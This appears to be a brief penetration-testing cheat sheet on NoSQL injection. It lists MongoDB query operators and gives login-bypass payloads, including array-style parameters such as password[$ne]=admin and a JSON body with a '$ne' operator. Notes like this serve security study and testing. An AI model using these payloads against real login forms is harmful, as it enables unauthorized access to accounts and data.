756 B

Raw Blame History

NoSQL Injections

No tables, but files (collections)
Examples are Elasticsearch, MongoDB, Redis, CouchDB.

Querying

Filter instead of SQL queries
Redis docs
MongoDB operators
Elasticsearch docs

Operators

Most common

$and
$or
$eq
$ne
$gt
$where
$exists
$regex

Tips & Tricks

Pass HTTP parameter as an array instead of user= and password= use user[$operator]=foo and password[$operator]=bar
- 2D array via user[$nin][]=foo

Example

POST or GET parameters

username=admin&password[$ne]=admin

JSON

{"username":"user","password":{"$ne":""} }